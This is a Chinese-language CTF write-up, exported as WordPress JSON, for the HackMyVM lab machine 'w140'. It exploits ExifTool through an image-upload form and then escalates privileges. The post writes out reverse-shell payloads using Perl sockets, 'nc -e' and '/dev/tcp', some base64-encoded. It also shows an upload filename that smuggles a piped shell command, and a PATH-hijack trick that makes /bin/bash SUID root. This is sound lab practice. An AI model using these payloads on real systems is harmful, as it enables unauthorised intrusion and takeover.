{"id":641,"date":"2024-04-27T00:51:02","date_gmt":"2024-04-26T16:51:02","guid":{"rendered":"http:\/\/162.14.82.114\/?p=641"},"modified":"2024-04-27T00:51:02","modified_gmt":"2024-04-26T16:51:02","slug":"hmv-_-w140","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/641\/04\/27\/2024\/","title":{"rendered":"hmv[-_-]w140"},"content":{"rendered":"

w140<\/h1>\n

\"image-20240426231140867\"<\/div><\/p>\n

\"image-20240426231651535\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/w140]\n\u2514\u2500$ rustscan -a 10.0.2.20 -- -A    \n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 10.0.2.20:22\nOpen 10.0.2.20:80\n[~] Starting Script(s)\n[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")\n\nWarning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP\/1\\.1 \\d\\d\\d (?:[^\\r\\n]*\\r\\n(?!\\r\\n))*?.*\\r\\nServer: Virata-EmWeb\/R([\\d_]+)\\r\\nContent-Type: text\/html; ?charset=UTF-8\\r\\nExpires: .*<title>HP (Color |)LaserJet ([\\w._ -]+)   '\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-26 11:17 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 11:17\nCompleted NSE at 11:17, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 11:17\nCompleted NSE at 11:17, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 11:17\nCompleted NSE at 11:17, 0.00s elapsed\nInitiating Ping Scan at 11:17\nScanning 10.0.2.20 [2 ports]\nCompleted Ping Scan at 11:17, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 11:17\nCompleted Parallel DNS resolution of 1 host. at 11:17, 0.01s elapsed\nDNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 11:17\nScanning 10.0.2.20 [2 ports]\nDiscovered open port 22\/tcp on 10.0.2.20\nDiscovered open port 80\/tcp on 10.0.2.20\nCompleted Connect Scan at 11:17, 0.00s elapsed (2 total ports)\nInitiating Service scan at 11:17\nScanning 2 services on 10.0.2.20\nCompleted Service scan at 11:17, 6.07s elapsed (2 services on 1 host)\nNSE: Script scanning 10.0.2.20.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 11:17\nCompleted NSE at 11:17, 0.32s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 11:17\nCompleted NSE at 11:17, 0.01s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 11:17\nCompleted NSE at 11:17, 0.00s elapsed\nNmap scan report for 10.0.2.20\nHost is up, received syn-ack (0.00044s latency).\nScanned at 2024-04-26 11:17:25 EDT for 6s\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n|   3072 ff:fd:b2:0f:38:88:1a:44:c4:2b:64:2c:d2:97:f6:8d (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJKWNkfy8PbdrAcMdxy7kWBq5iWHXTzkG3xRUBL5P88XuLi8SZLoMTwIcS5APTEU5hHz6ae2dNtq\/NRBD2NkLREINsgJNEgEEosMQLrJMCgUqVLZQGObJOG3USAQ42QmW3rMp34L2bSPqmq1IRGPbI1FoV6ToRveEXooUTiMrl07nVsI3xwdm7O6V653JmlE1qKYH\/tL1bQ5TQ43dX2INZRjuzB20SdOm5p1x2QnFcKjngbhmGDyYBN9FMSGsrPMdvjd6WHAeU0hzJgg7Uw55nkWzmWPfjwzkGTg1O74edFAgEj1AvBvl4Of3pcAf0EpxP5TOuawIsmKBmC+oQIgh2MgFXrKr7oMAxvSasvkAkMaXXe7tEMdDxgIr5w1TWgaxSUHM1vS58Z3+Ebxcss8NgbeeCA4iCUutg9iPPudFgzJSw7g0L0xS8w942f6DdQFOo65FEOwj9j54ESfMU8d6IyMtd1METepK3KFpyyBiiHYnjGOy9ns1E7f\/fo7+KtIM=\n|   256 ca:50:54:f7:24:4e:a7:f1:06:46:e7:22:30:ec:95:b7 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLCt2rpz+6Yt+kOCXbY2sLJEwc66kfCz200w1PiexHM7HN8IdliV0pg\/iktzu3lsOBeFwmYbsD1NHHZz7j6Ftgg=\n|   256 09:68:c0:62:83:1e:f1:5d:cb:29:a6:5e:b4:72:aa:cf (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAI0q5tzWMhFnkW\/6Zz8ER108rSSLtVfq8YX5AnJ3vQG\n80\/tcp open  http    syn-ack Apache httpd 2.4.54 ((Debian))\n|_http-title: w140\n| http-methods: \n|_  Supported Methods: HEAD GET POST OPTIONS\n|_http-server-header: Apache\/2.4.54 (Debian)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 11:17\nCompleted NSE at 11:17, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 11:17\nCompleted NSE at 11:17, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 11:17\nCompleted NSE at 11:17, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 6.67 seconds<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/w140]\n\u2514\u2500$ gobuster dir -u http:\/\/10.0.2.20 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/10.0.2.20\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              bak,jpg,txt,html,php,zip\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 274]\n\/index.html           (Status: 200) [Size: 13235]\n\/.html                (Status: 403) [Size: 274]\n\/assets               (Status: 301) [Size: 307] [--> http:\/\/10.0.2.20\/assets\/]\n\/service.html         (Status: 200) [Size: 3417]\n\/upload.php           (Status: 200) [Size: 3773]\n\/css                  (Status: 301) [Size: 304] [--> http:\/\/10.0.2.20\/css\/]\n\/manual               (Status: 301) [Size: 307] [--> http:\/\/10.0.2.20\/manual\/]\n\/js                   (Status: 301) [Size: 303] [--> http:\/\/10.0.2.20\/js\/]\n\/.html                (Status: 403) [Size: 274]\n\/.php                 (Status: 403) [Size: 274]\n\/server-status        (Status: 403) [Size: 274]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/w140]\n\u2514\u2500$ whatweb http:\/\/10.0.2.20http:\/\/10.0.2.20 [200 OK] Apache[2.4.54], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache\/2.4.54 (Debian)], IP[10.0.2.20], JQuery[3.3.1], PasswordField[confirm-password,user-password], Script[text\/javascript], Title[w140]<\/code><\/pre>\n
\u6587\u4ef6\u4e0a\u4f20<\/h3>\n
\"image-20240426232542404\"<\/div><\/p>\n
\u5c1d\u8bd5\u4e0a\u4f20\u53cd\u5f39shell\uff1a<\/p>\n
\"image-20240426232746431\"<\/div><\/p>\n
\u5c1d\u8bd5\u4e0a\u4f20\u4f2a\u88c5\u7684\u53cd\u5f39shell\u5931\u8d25\uff0c\u968f\u4fbf\u4e0a\u4f20\u4e00\u4e2a\u7167\u7247\u8bd5\u8bd5\uff01<\/p>\n
\"image-20240426233008375\"<\/div>
\n
\"image-20240426233022347\"<\/div><\/p>\n
\u6f0f\u6d1e\u5c1d\u8bd5<\/h3>\n
\u770b\u5230\u7248\u672c\u4e86\uff0c\u5c1d\u8bd5\u641c\u7d22\u6f0f\u6d1e\uff01\uff01\uff01<\/p>\n
\"image-20240426233203871\"<\/div><\/p>\n
\u5c1d\u8bd5\u5229\u7528\u4e00\u4e0b\uff0c\u4f46\u662f\u6211\u5728\u5229\u7528\u7684\u65f6\u5019\u5341\u5206\u4e0d\u987a\u5229\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/w140]\n\u2514\u2500$ python3 50911.py -s 10.0.2.4 1234                                        \n\n        _ __,~~~\/_        __  ___  _______________  ___  ___\n    ,~~`( )_( )-\\|       \/ \/ \/ \/ |\/ \/  _\/ ___\/ __ \\\/ _ \\\/ _ \\\n        |\/|  `--.       \/ \/_\/ \/    \/\/ \/\/ \/__\/ \/_\/ \/ , _\/ \/\/ \/\n_V__v__&#_!_____V____\\____\/_\/|_\/___\/\\___\/\\____\/_\/|_\/____\/....\n\nRUNNING: UNICORD Exploit for CVE-2021-22204\nPAYLOAD: (metadata "\\c${use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(1234,inet_aton('10.0.2.4')))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('\/bin\/sh -i');};};")\nTraceback (most recent call last):\n  File "\/home\/kali\/temp\/w140\/50911.py", line 138, in <module>\n    exploit(command)\n  File "\/home\/kali\/temp\/w140\/50911.py", line 74, in exploit\n    subprocess.run(['bzz', 'payload', 'payload.bzz'])\n  File "\/usr\/lib\/python3.11\/subprocess.py", line 548, in run\n    with Popen(*popenargs, **kwargs) as process:\n         ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File "\/usr\/lib\/python3.11\/subprocess.py", line 1026, in __init__\n    self._execute_child(args, executable, preexec_fn, close_fds,\n  File "\/usr\/lib\/python3.11\/subprocess.py", line 1953, in _execute_child\n    raise child_exception_type(errno_num, err_msg, err_filename)\nFileNotFoundError: [Errno 2] No such file or directory: 'bzz'<\/code><\/pre>\n
\u5176\u5b9e\u5e76\u6ca1\u6709\u9519\uff0c\u4f46\u662f\u9700\u8981\u8fdb\u884c\u8f6c\u6362\uff0c\u6709\u4e9b\u590d\u6742\uff0c\u5c1d\u8bd5\u4f7f\u7528msf\u7684\u73b0\u6709\u6a21\u5757\uff01<\/p>\n
https:\/\/vk9-sec.com\/exiftool-12-23-arbitrary-code-execution-privilege-escalation-cve-2021-22204\/<\/a><\/p>\n
msf6 > search exiftool 12.23\n\nMatching Modules\n================\n\n   #  Name                                                      Disclosure Date  Rank       Check  Description\n   -  ----                                                      ---------------  ----       -----  -----------\n   0  exploit\/unix\/fileformat\/exiftool_djvu_ant_perl_injection  2021-05-24       excellent  No     ExifTool DjVu ANT Perl injection\n   1    \\_ target: JPEG file                                    .                .          .      .\n   2    \\_ target: TIFF file                                    .                .          .      .\n   3    \\_ target: DjVu file                                    .                .          .      .\n\nInteract with a module by name or index. For example info 3, use 3 or use exploit\/unix\/fileformat\/exiftool_djvu_ant_perl_injection\nAfter interacting with a module you can manually set a TARGET with set TARGET 'DjVu file'\n\nmsf6 > use 3\n[*] Additionally setting TARGET => DjVu file\n[*] No payload configured, defaulting to cmd\/unix\/python\/meterpreter\/reverse_tcp\nmsf6 exploit(unix\/fileformat\/exiftool_djvu_ant_perl_injection) > show options\n\nModule options (exploit\/unix\/fileformat\/exiftool_djvu_ant_perl_injection):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   FILENAME  msf.jpg          yes       Output file\n\nPayload options (cmd\/unix\/python\/meterpreter\/reverse_tcp):\n\n   Name   Current Setting  Required  Description\n   ----   ---------------  --------  -----------\n   LHOST  10.0.2.4         yes       The listen address (an interface may be specified)\n   LPORT  4444             yes       The listen port\n\n   **DisablePayloadHandler: True   (no handler will be created!)**\n\nExploit target:\n\n   Id  Name\n   --  ----\n   2   DjVu file\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(unix\/fileformat\/exiftool_djvu_ant_perl_injection) > set lport 1234\nlport => 1234\nmsf6 exploit(unix\/fileformat\/exiftool_djvu_ant_perl_injection) > show options\n\nModule options (exploit\/unix\/fileformat\/exiftool_djvu_ant_perl_injection):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   FILENAME  msf.jpg          yes       Output file\n\nPayload options (cmd\/unix\/python\/meterpreter\/reverse_tcp):\n\n   Name   Current Setting  Required  Description\n   ----   ---------------  --------  -----------\n   LHOST  10.0.2.4         yes       The listen address (an interface may be specified)\n   LPORT  1234             yes       The listen port\n\n   **DisablePayloadHandler: True   (no handler will be created!)**\n\nExploit target:\n\n   Id  Name\n   --  ----\n   2   DjVu file\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(unix\/fileformat\/exiftool_djvu_ant_perl_injection) > run\n\n[+] msf.jpg stored at \/home\/kali\/.msf4\/local\/msf.jpg\nmsf6 exploit(unix\/fileformat\/exiftool_djvu_ant_perl_injection) > exit\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/w140]\n\u2514\u2500$ cp \/home\/kali\/.msf4\/local\/msf.jpg .<\/code><\/pre>\n
\"image-20240427000443651\"<\/div><\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/w140]\n\u2514\u2500$ file msf.jpg \nmsf.jpg: DjVu multiple page document<\/code><\/pre>\n
\u7b49\u4e0b\uff0c\u6f0f\u6d1e\u7248\u672c\u4e0d\u5bf9\u3002\u3002\u3002\u3002<\/p>\n
\"image-20240427001942610\"<\/div><\/p>\n
https:\/\/github.com\/dpbe32\/CVE-2022-23935-PoC-Exploit\/blob\/main\/exploit.sh<\/a><\/p>\n
#!\/bin\/bash\n\n# CVE-2022-23935 exiftool version 12.37\n\n# If the program gives error, you can exploit it manually with the following commands:\n\n#echo "ping 10.10.14.70 -c1" | base64\n#mv imagen.png "echo base64_code|base64 -d|sh|"\n\nfunction ctrl_c(){\n    echo -e "\\n\\n [!] Exiting...\\n\\n"\n    exit 1\n}\n\n# Ctrl+c\ntrap ctrl_c INT\n\nif [ "$(id -u)" == "0" ]; then\n    mv image.png "echo $(echo 'whoami'|base64) | base64 -d | sh"\nelse\n    echo -e "\\n[!] You need execute this program with root user"\nfi<\/code><\/pre>\n
\u53ef\u4ee5\u770b\u5230\u6f0f\u6d1e\u539f\u7406\u662f\u6539\u53d8\u540d\u5b57\u8fdb\u884c\u5f39shell\uff01\uff01\uff01<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/w140]\n\u2514\u2500$ echo "nc -e \/bin\/bash 10.0.2.4 1234" | base64\nbmMgLWUgL2Jpbi9iYXNoIDEwLjAuMi40IDEyMzQK<\/code><\/pre>\n
\u6240\u4ee5\u6587\u4ef6\u540d\u4e3a\uff1aecho bmMgLWUgL2Jpbi9iYXNoIDEwLjAuMi40IDEyMzQK|base64 -d|sh|<\/code><\/p>\n
\u6b63\u5e38\u80af\u5b9a\u662f\u4e0d\u884c\u7684\uff0c\u6293\u5305\u4fee\u6539!<\/p>\n
Content-Disposition: form-data; name="image"; filename="echo 'bmMgLWUgL2Jpbi9iYXNoIDEwLjAuMi40IDEyMzQK'|base64 -d|sh|"\n\nContent-Type: image\/png<\/code><\/pre>\n
\u989d\uff0c\u6ca1\u6210\u529f\uff0c\u6362\u4e00\u4e2a\u3002\u3002\u3002\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/w140\/CVE-2021-22204-exiftool]\n\u2514\u2500$ echo -n "bash -i >& \/dev\/tcp\/10.0.2.4\/1234 0>&1" | base64\nYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjIuNC8xMjM0IDA+JjE=<\/code><\/pre>\n
Content-Disposition: form-data; name="image"; filename="echo -n 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjIuNC8xMjM0IDA+JjE='|base64 -d|bash|"\n\nContent-Type: image\/png<\/code><\/pre>\n
\"image-20240427003523371\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
(remote) www-data@w140:\/var\/www\/uploads\/1714149308$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@w140:\/var\/www\/uploads\/1714149308$ cd ..\/..\/\n(remote) www-data@w140:\/var\/www$ ls -la\ntotal 48\ndrwxr-xr-x  4 root     root  4096 Feb 21  2023 .\ndrwxr-xr-x 12 root     root  4096 Jan 29  2023 ..\n-rw-r--r--  1 root     root 28744 Feb 21  2023 .w140.png\ndrwxr-xr-x  7 root     root  4096 Feb 14  2023 html\ndrwx------  8 www-data root  4096 Apr 26 12:35 uploads\n(remote) www-data@w140:\/var\/www$ cat .w140.png<\/code><\/pre>\n
QRcode decode!<\/h3>\n
\u5565\u73a9\u610f\uff0c\u4f20\u8fc7\u6765\u770b\u770b\uff1a<\/p>\n
\"image-20240427004007237\"<\/div><\/p>\n
\u989d\uff0c\u626b\u4e00\u4e0b\uff1ahttps:\/\/online-barcode-reader.inliteresearch.com\/<\/a><\/p>\n
\"image-20240427004113074\"<\/div><\/p>\n
BaoeCblP5KGJDmA<\/code><\/pre>\n
(remote) www-data@w140:\/var\/www$ ls -la\ntotal 48\ndrwxr-xr-x  4 root     root  4096 Feb 21  2023 .\ndrwxr-xr-x 12 root     root  4096 Jan 29  2023 ..\n-rw-r--r--  1 root     root 28744 Feb 21  2023 .w140.png\ndrwxr-xr-x  7 root     root  4096 Feb 14  2023 html\ndrwx------  8 www-data root  4096 Apr 26 12:35 uploads\n(remote) www-data@w140:\/var\/www$ cd \/home\n(remote) www-data@w140:\/home$ ls -la\ntotal 12\ndrwxr-xr-x  3 root  root  4096 Jan 29  2023 .\ndrwxr-xr-x 18 root  root  4096 Jan 29  2023 ..\ndrwxr-xr-x  3 ghost ghost 4096 Feb 21  2023 ghost\n(remote) www-data@w140:\/home$ su ghost\nPassword: \nghost@w140:\/home$ <\/code><\/pre>\n
\u5e78\u597d\u53ea\u6709\u4e00\u4e2a\u7528\u6237\uff0c\u6211\u4e5f\u8bd5\u4e86root\uff0c\u4f46\u662f\u4e0d\u5bf9\u3002\u3002\u3002\u3002<\/p>\n
\u52ab\u6301\u73af\u5883\u53d8\u91cf<\/h3>\n
ghost@w140:\/home$ sudo -l\nMatching Defaults entries for ghost on w140:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser ghost may run the following commands on w140:\n    (root) SETENV: NOPASSWD: \/opt\/Benz-w140\nghost@w140:\/home$ file \/opt\/Benz-w140\n\/opt\/Benz-w140: ASCII text\nghost@w140:\/home$ cat \/opt\/Benz-w140\n\n#!\/bin\/bash\n. \/opt\/.bashre\ncd \/home\/ghost\/w140      \n\n# clean up log files\nif [ -s log\/w140.log ] && ! [ -L log\/w140.log ]\nthen\n\/bin\/cat log\/w140.log > log\/w140.log.old\n\/usr\/bin\/truncate -s@ log\/w140.log\nfi\n\n# protect the priceless originals\nfind source_images -type f -name '*.jpg' -exec chown root:root {} \\;<\/code><\/pre>\n
\u53d1\u73b0find\u4f7f\u7528\u7684\u662f\u76f8\u5bf9\u8def\u5f84\uff0c\u5c1d\u8bd5\u8fdb\u884c\u52ab\u6301\uff01\uff01\uff01<\/p>\n
ghost@w140:\/home$ cd \/tmp\nghost@w140:\/tmp$ echo 'chmod +s \/bin\/bash' > find\nghost@w140:\/tmp$ ls -l find\n-rw-r--r-- 1 ghost ghost 19 Apr 26 12:45 find\nghost@w140:\/tmp$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1234376 Mar 27  2022 \/bin\/bash\nghost@w140:\/tmp$ chmod +x find\nghost@w140:\/tmp$ PATH=$PWD:$PATH\nghost@w140:\/tmp$ echon $PATH\nbash: echon: command not found\nghost@w140:\/tmp$ echo $PATH\n\/tmp:\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin\nghost@w140:\/tmp$ sudo -l\nMatching Defaults entries for ghost on w140:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser ghost may run the following commands on w140:\n    (root) SETENV: NOPASSWD: \/opt\/Benz-w140\nghost@w140:\/tmp$ sudo \/opt\/Benz-w140\n.\n.\/find\n\/opt\/Benz-w140: 4: cd: can't cd to \/home\/ghost\/w140\nfind: \u2018source_images\u2019: No such file or directory\nghost@w140:\/tmp$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1234376 Mar 27  2022 \/bin\/bash\nghost@w140:\/tmp$ sudo $PATH \/opt\/Benz-w140\n[sudo] password for ghost: \nsudo: \/tmp:\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin: command not found\nghost@w140:\/tmp$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1234376 Mar 27  2022 \/bin\/bash\nghost@w140:\/tmp$ sudo PATH=\/tmp:\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games \/opt\/Benz-w140\n\/opt\/Benz-w140: 4: cd: can't cd to \/home\/ghost\/w140\nghost@w140:\/tmp$ ls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1234376 Mar 27  2022 \/bin\/bash\nghost@w140:\/tmp$ \/bin\/bash -p\nghost@w140:\/tmp# id\nuid=1000(ghost) gid=1000(ghost) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(ghost)\nghost@w140:\/tmp# cd \/root\nghost@w140:\/root# ls -la\ntotal 24\ndrwx------  3 root root 4096 Feb 21  2023 .\ndrwxr-xr-x 18 root root 4096 Jan 29  2023 ..\nlrwxrwxrwx  1 root root    9 Feb  8  2023 .bash_history -> \/dev\/null\n-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc\ndrwxr-xr-x  3 root root 4096 Feb 14  2023 .local\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rw-------  1 root root    0 Feb 21  2023 .python_history\n-rw-------  1 root root   33 Feb 21  2023 root.txt\nghost@w140:\/root# cat root.txt \n2f9f7d1b4a6ae9d6bbbaf6298c5dcc25<\/code><\/pre>\n
\u5176\u5b9e\u8fd9\u91cc\u53ef\u4ee5\u76f4\u63a5bash\u7684\u3002\u3002\u3002\u3002\u3002\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"
w140 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/w140] \u2514\u2500$ rustsca […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-641","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/641","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=641"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/641\/revisions"}],"predecessor-version":[{"id":642,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/641\/revisions\/642"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=641"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=641"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=641"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}